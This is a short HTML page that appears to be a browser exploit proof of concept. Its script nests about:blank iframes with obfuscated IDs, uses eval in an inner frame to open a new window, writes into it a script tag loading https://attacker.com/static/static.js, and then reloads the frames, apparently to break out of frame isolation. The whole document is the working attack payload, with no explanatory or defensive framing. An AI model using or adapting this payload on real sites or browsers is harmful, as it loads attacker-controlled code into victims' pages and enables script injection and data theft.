<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGnNXRHGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGnNXRHGGGGG.onload=_=>GGGGGnNXRHGGGGG.contentDocument.body.innerHTML+="<iframe id=GGGGnNXRHGGGG src=about:blank><\/iframe><script>GGGGnNXRHGGGG.onload=_=>GGGGnNXRHGGGG.contentWindow.eval('w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js><\\/script>`);');GGGGnNXRHGGGG.contentWindow.location.reload();<\/script>";GGGGGnNXRHGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>